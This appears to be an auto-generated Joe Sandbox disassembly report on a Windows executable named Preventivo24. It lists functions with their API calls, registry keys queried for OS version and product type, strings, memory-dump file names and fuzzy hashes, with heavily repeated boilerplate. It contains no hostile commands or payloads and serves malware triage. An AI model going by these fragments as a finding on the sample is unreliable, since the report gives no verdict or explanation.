LoadLibraryW.KERNEL32(ComCtl32.dll,26FBC52C,00000000,00000000,?), ref: 00B20CDA
GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00B20D00
FreeLibrary.KERNEL32(00000000), ref: 00B20D89

Strings

LoadIconMetric, xrefs: 00B20CFA
ComCtl32.dll, xrefs: 00B20CCE

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ComCtl32.dll$LoadIconMetric
API String ID: 145871493-764666640
Opcode ID: 1598cee25bd9d6c460629799e289d03e060be1ed968968ee2f59d19a09327383
Instruction ID: 2c2c6ffede8464ae4657d4084ed63137d533c21d080796e05c83cb8e7d80c4d5
Opcode Fuzzy Hash: 1598cee25bd9d6c460629799e289d03e060be1ed968968ee2f59d19a09327383
Instruction Fuzzy Hash: 24317CB1A00269ABDB119F94DD18BAFBBB8FB44750F00026AFC15E3390E7755D008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B54BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B54CBA

Strings

\, xrefs: 00B54C5E
\, xrefs: 00B54C34
\, xrefs: 00B54C3C

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DiskFreeSpace
String ID: \$\$\
API String ID: 1705453755-3791832595
Opcode ID: a2104621a8b803a8a47855881fead5db61bcfce4d15965fae479569c4eaf2842
Instruction ID: 5b8b602df19d5cfdb01bc840841fde29f783ecd0876ff3c851049e060158c4b8
Opcode Fuzzy Hash: a2104621a8b803a8a47855881fead5db61bcfce4d15965fae479569c4eaf2842
Instruction Fuzzy Hash: 7641E022A152558ACB309F248440BABB3F4FFD535EF154AEEECD893140F7659CC88386

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F6F0 Relevance: 6.8, Strings: 5, Instructions: 569COMMON

Download Yara Rule

Strings

MultipleInstancesProps, xrefs: 00A0F820, 00A0FC8E
MultipleInstances, xrefs: 00A0F756
AI_EXIST_NEW_INSTANCES, xrefs: 00A0FAD9
AI_EXIST_INSTANCES, xrefs: 00A0F973
PropertyValue, xrefs: 00A0FD98

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
API String ID: 0-2308371840
Opcode ID: 3b6c10aaa104ec35be0ab8038ccd453bde9703dee15b6f6c8aef451d49ba1e26
Instruction ID: 7f2699a0e201c099baf8afaa028b703a30a0d9a574f4df657e491810ce889b6e
Opcode Fuzzy Hash: 3b6c10aaa104ec35be0ab8038ccd453bde9703dee15b6f6c8aef451d49ba1e26
Instruction Fuzzy Hash: 1A32DF70E0024C9FDB14DFA4D859BEEBBB1BF45304F248269E405BB6D1DB746A84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B49080 Relevance: 6.6, APIs: 4, Instructions: 644fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

FindFirstFileW.KERNEL32(?,?,00000000,00000000,?,?), ref: 00B494BF
FindClose.KERNEL32(00000000), ref: 00B49503
CloseHandle.KERNEL32(?,?), ref: 00B49801

Part of subcall function 00B6A2E0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,26FBC52C,?,?,?,?,?,?,00C45C7D), ref: 00B6A344

CloseHandle.KERNEL32(?,?), ref: 00B499CB

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Close$FileFindHandle$CreateFirstHeapProcess
String ID:
API String ID: 1937692618-0
Opcode ID: 1aa5078e52596c26060dcbe0e1e7f71ba85da6f5d409985e9bb5fcbf33cca2c5
Instruction ID: d8fe5bfd4eb837343e49f060504bcc2fdb827649173dec946404a5706c3fa4f1
Opcode Fuzzy Hash: 1aa5078e52596c26060dcbe0e1e7f71ba85da6f5d409985e9bb5fcbf33cca2c5
Instruction Fuzzy Hash: 91524730D00A68CFDB24CB68CC547AEBBB1AF49315F1482D9E419A7292DB70AF85DF41

Uniqueness

Uniqueness Score: -1.00%

Function 00B25910 Relevance: 6.3, APIs: 4, Instructions: 328memoryCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,?,?,00000100), ref: 00B25A13
LoadStringW.USER32(?,?,?,00000001), ref: 00B25B33
SysFreeString.OLEAUT32(00000000), ref: 00B25CCE
SysAllocStringLen.OLEAUT32(?,?), ref: 00B25CF5

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: String$Load$AllocFree
String ID:
API String ID: 1561515232-0
Opcode ID: 2948a47f5c8a1b5e5929fa7b6684045ac897ac86c04cac6e92d70814a23436bc
Instruction ID: 69bf395a69d04c7f58602461a31d7eb9cbdd7cde156efc68d1fe8808dddc2fbf
Opcode Fuzzy Hash: 2948a47f5c8a1b5e5929fa7b6684045ac897ac86c04cac6e92d70814a23436bc
Instruction Fuzzy Hash: 37C1AF71D0065C9FDB10CFA8D989BEEBBF5FF48304F14825AE415AB280EB746A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BEA23A Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,00B4BA31,?,?,?), ref: 00BEA23F
HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00BEA246
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 00BEA28C
HeapFree.KERNEL32(00000000,?,?,?), ref: 00BEA293

Part of subcall function 00BEA0D8: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00BEA282,?,?,?,?), ref: 00BEA0FC
Part of subcall function 00BEA0D8: HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00BEA103

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: 0bdcfb6bf381501bea4b871011e40f9d80f11012e45c9c87c965ff0e6e92ecf3
Instruction ID: d3fdfff5521701d17856a382856b09427949c655e85f690235f2a388ed092b78
Opcode Fuzzy Hash: 0bdcfb6bf381501bea4b871011e40f9d80f11012e45c9c87c965ff0e6e92ecf3
Instruction Fuzzy Hash: 83F0247360831197C72027B97C0CB1F2BACEFC0BA07018AA8F54AD6190DF21D8409762

Uniqueness

Uniqueness Score: -1.00%

Function 00B1D700 Relevance: 4.6, APIs: 3, Instructions: 92fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,?,?,00000000), ref: 00B1D79F
FindClose.KERNEL32(00000000), ref: 00B1D7FE

Part of subcall function 009EB070: RtlAllocateHeap.NTDLL(?,00000000,?,26FBC52C,00000000,00C11B00,000000FF,?,?,00D25D3C,?,00000000,00B69FAB,8000000B,26FBC52C), ref: 009EB0BA

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Find$AllocateCloseFileFirstHeap
String ID:
API String ID: 1673784098-0
Opcode ID: 1d4a63c445bc8218ebcdcc217cf3930a836fc16f5e97abe3adc49a7621afaf93
Instruction ID: a108a588ff1445be237b1cd136571ab68126ed9d13de7d832272cd4e995d487c
Opcode Fuzzy Hash: 1d4a63c445bc8218ebcdcc217cf3930a836fc16f5e97abe3adc49a7621afaf93
Instruction Fuzzy Hash: FD31BE75905218DFDB24DF54C889BAAB7F4FB84324F6082AEE91997380E7715E84CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00AD73D0 Relevance: 3.2, APIs: 2, Instructions: 234libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD7412

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

Part of subcall function 009EA880: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,00000000,009EAA2B,-00000010,?,?,?,26FBC52C,00000000,?,?), ref: 009EA8A3

LoadLibraryExW.KERNEL32(?,00000000,00000000,00C4B76D,000000FF), ref: 00AD74E9

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DirectoryFindHeapLibraryLoadProcessResourceSystem
String ID:
API String ID: 2891229163-0
Opcode ID: 63a6a677f2ad9b1da3d656f43a18917f38d2f8f2e556dbcff76fa655baa618b5
Instruction ID: fe5f9e79bbd76832d433ee3ea74548aef58ac9a9c177c12914cb6a24af383d20
Opcode Fuzzy Hash: 63a6a677f2ad9b1da3d656f43a18917f38d2f8f2e556dbcff76fa655baa618b5
Instruction Fuzzy Hash: 25A17AB0504649EFE715CF64C858B9ABBF4FF04318F10825DD8199B781E7BAAA18CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00B63AD0 Relevance: 3.1, APIs: 2, Instructions: 92filepipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,00000000,26FBC52C,?,?,00000000), ref: 00B63B5B
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,00000000,26FBC52C,?,?,00000000), ref: 00B63B81

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Create$FileNamedPipe
String ID:
API String ID: 1328467360-0
Opcode ID: 31376837ed7a1e321ba476d5bbd9f31709e6bc252ced96d834cd2a0e992ba84a
Instruction ID: 99ae28a3f2a54695c7082b97ea12109ff7af8a25622f6f3a01939d54d92a9bf5
Opcode Fuzzy Hash: 31376837ed7a1e321ba476d5bbd9f31709e6bc252ced96d834cd2a0e992ba84a
Instruction Fuzzy Hash: F3312631A4870AAFD721CF28DC01B5ABBE4EB05B20F14876EF565A73D0DB75A940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A22520 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__set_se_translator.LIBVCRUNTIME ref: 00A22538
SetUnhandledExceptionFilter.KERNEL32(00B1C550), ref: 00A2254E

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ExceptionFilterUnhandled__set_se_translator
String ID:
API String ID: 2480343447-0
Opcode ID: 5bdeb4e8fc104ca2a7d76435d5b43c7b5b65ff40f7d08649a0c7ad486d5a983e
Instruction ID: e35aabc4bf4b7295b2555b895a2d7490f5147ad63bb6c3dfaec9d1265ace30e6
Opcode Fuzzy Hash: 5bdeb4e8fc104ca2a7d76435d5b43c7b5b65ff40f7d08649a0c7ad486d5a983e
Instruction Fuzzy Hash: 75E0DF7B614350ABC700A769FC09F8E7FA4AB96B10F844096F606A3275C76459868BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B6AD30 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: c186c56f1915bf7785afdd194fa03011bfeb5d5057c3957e13bd81baf9981fa7
Instruction ID: 1b4f433ebeb6862ab2197f01a0366877ff0af5a6dabc738ffd548677f9de3521
Opcode Fuzzy Hash: c186c56f1915bf7785afdd194fa03011bfeb5d5057c3957e13bd81baf9981fa7
Instruction Fuzzy Hash: 607139B0A0074ADBDB05CF64C49479ABBE0BF05318F1481ADD5199B782DBB9A91ACFC1

Uniqueness

Uniqueness Score: -1.00%

Function 00B22FE0 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 223
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00B2305A
RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?,?), ref: 00B2308F
RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 00B2310E
RegCloseKey.KERNEL32(00000000), ref: 00B232EE

Strings

Enterprise, xrefs: 00B23169
Compute Server, xrefs: 00B2328C
Blade, xrefs: 00B23230
ProductType, xrefs: 00B23084
Small Business(Restricted), xrefs: 00B231CD
Terminal Server, xrefs: 00B231B4
EmbeddedNT, xrefs: 00B231E6
Embedded(Restricted), xrefs: 00B23247
Security Appliance, xrefs: 00B2325E
Personal, xrefs: 00B23219
CommunicationServer, xrefs: 00B2319B
Storage Server, xrefs: 00B23275
SYSTEM\CurrentControlSet\Control\ProductOptions, xrefs: 00B23050
Small Business, xrefs: 00B23150
DataCenter, xrefs: 00B231FF
ProductSuite, xrefs: 00B23103
BackOffice, xrefs: 00B23182
ServerNT, xrefs: 00B230BC
WinNT, xrefs: 00B23099

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
API String ID: 1586453840-3149529848
Opcode ID: 6a3049816752c3fec21ae3bb7de0e762599db7f3895c4595bc65fb76fd8dc78b
Instruction ID: 7da5363b045391b6fe6df72572da19afa8db58440da541c3901265d53672e2a6
Opcode Fuzzy Hash: 6a3049816752c3fec21ae3bb7de0e762599db7f3895c4595bc65fb76fd8dc78b
Instruction Fuzzy Hash: B9718F70700728CBDB209B64ED417EB72E5EB41B44F1044F9E90EAB681EF78CE4A8B51

Uniqueness

Uniqueness Score: -1.00%

Function 00B22C30 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 227
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00B22CA8
RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00B22CE9
RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00B22D0C
RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00B22D3F
RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00B22DB8
RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00B22E2F
RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00B22E85
GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00B22F23
GetProcAddress.KERNEL32(00000000), ref: 00B22F2A
GetCurrentProcess.KERNEL32(?), ref: 00B22F61
IsWow64Process.KERNEL32 ref: 00B22F70
RegCloseKey.ADVAPI32(00000000), ref: 00B22FAA

Strings

CurrentVersion, xrefs: 00B22D34
CSDVersion, xrefs: 00B22E7A
CurrentMinorVersionNumber, xrefs: 00B22D01
CurrentBuildNumber, xrefs: 00B22DAD
ReleaseId, xrefs: 00B22E24
CurrentMajorVersionNumber, xrefs: 00B22CDE
IsWow64Process, xrefs: 00B22F19
